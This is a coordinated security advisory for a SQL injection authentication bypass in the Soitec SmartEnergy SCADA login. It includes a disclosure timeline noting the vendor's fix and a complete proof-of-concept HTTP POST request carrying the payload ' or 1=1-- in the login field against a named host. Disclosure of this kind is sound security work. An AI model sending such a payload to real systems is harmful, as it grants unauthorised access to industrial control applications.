Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit


Vendor: Soitec
Product web page: http://www.soitec.com
Affected version: 1.4 and 1.3

Summary: Soitec power plants are a profitable and ecological investment
at the same time. Using Concentrix technology, Soitec offers a reliable,
proven, cost-effective and bankable solution for energy generation in the
sunniest regions of the world. The application shows how Concentrix technology
works on the major powerplants managed by Soitec around the world. You will
be able to see for each powerplant instantaneous production, current weather
condition, 3 day weather forecast, Powerplant webcam and Production data history.

Desc: Soitec SmartEnergy web application suffers from an authentication bypass
vulnerability using SQL Injection attack in the login script. The script fails
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
mechanism and view sensitive information that can be further used in a social
engineering attack.

Tested on: nginx/1.6.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[16.11.2014] Vulnerability discovered.
[02.12.2014] Vendor contacted.
[08.12.2014] Vendor responds asking more details.
[08.12.2014] Sent details to the vendor.
[09.12.2014] Vendor confirms the vulnerability.
[12.12.2014] Vendor applies fix to version 1.4.
[14.12.2014] Coordinated public security advisory released.


Advisory ID: ZSL-2014-5216
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php


16.11.2014

---



POST /scada/login HTTP/1.1
Host: smartenergy.soitec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smartenergy.soitec.com/scada/login
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah